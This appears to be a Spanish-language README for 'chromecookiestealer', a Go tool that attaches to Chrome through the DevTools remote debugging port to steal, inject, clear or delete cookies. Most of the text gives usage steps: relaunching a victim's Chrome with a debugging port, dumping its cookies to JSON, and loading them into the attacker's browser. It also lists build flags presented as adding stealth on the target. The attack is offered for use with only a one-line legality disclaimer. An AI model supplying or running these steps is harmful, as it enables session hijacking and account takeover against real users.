
Robar/Inyectar cookies de Chrome a través del protocolo DevTools (--remote-debugging-port).
Se adjunta a Chrome utilizando su protocolo Remote DevTools y roba/inyecta/limpia/elimina cookies.
Muy inspirado por WhiteChocolateMacademiaNut.
Las cookies se vuelcan como objetos JSON usando el propio formato de Chrome. El mismo formato se usa para las cookies a cargar.
Solo para uso legal.
Robar las cookies de una víctima:
git clone https://github.com/magisterquis/chromecookiestealer.git
cd chromecookiestealer
go build
pkill Chrome
/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --remote-debugging-port=9222 --restore-last-session # Varies by target
./chromecookiestealer -dump ./cookies.json
Inyectar en el navegador local del atacante:
# Inicia Chrome con un puerto de depuración, como arriba.
./chromecookiestealer -clear -inject ./cookies.json
Usage: chromecookiestealer [options]
Attaches to Chrome using the Remote DevTools Protocol (--remote-debugging-port)
and, in order and as requested:
- Dumps cookies
- Clears cookies
- Injects cookies
- Deletes selected cookies
Parameters for cookies to be deleted should be represented as an array of JSON
objects with the following string fields:
name - Name of the cookies to remove.
url - If specified, deletes all the cookies with the given name where domain
and path match provided URL.
domain - If specified, deletes only cookies with the exact domain.
path - If specified, deletes only cookies with the exact path.
Filenames may also be "-" for stdin/stdout.
Options:
-chrome URL
Chrome remote debugging URL (default "ws://127.0.0.1:9222")
-clear
Clear browser cookies
-delete file
Name of file containing parameters for cookies to delete
-dump file
Name of file to which to dump stolen cookies
-inject file
Name of file containing cookies to inject
-no-summary
Don't print a summary on exit
-verbose
Enable verbose logging
go build debería ser suficiente. Lo siguiente se puede establecer en
tiempo de compilación con -ldflags '-X main.Foo=bar' para un poco más de
sigilo en el objetivo.
Ninguno de los anteriores está establecido por defecto.
El Protocolo Chrome DevTools es un objetivo en movimiento. Puede ser necesario usar una versión más reciente de las librerías chromedp y cdproto en caso de que este programa deje de funcionar. Esto se puede hacer con
go get -u -v all
go mod tidy
go build
lo que podría tener el efecto secundario de romper todo lo demás.
¯\_(ツ)_/¯
| Variable | Descripción |
|---|
| DumpFile | Nombre de un archivo al que volcar cookies. Implica -dump |
| InjectFile | Nombre de un archivo desde el cual inyectar cookies. Implica -inject |
| DeleteFile | Nombre de un archivo con parámetros que describen cookies a eliminar. Implica -delete |
| DoClear | Si se establece a cualquier valor, implica -clear |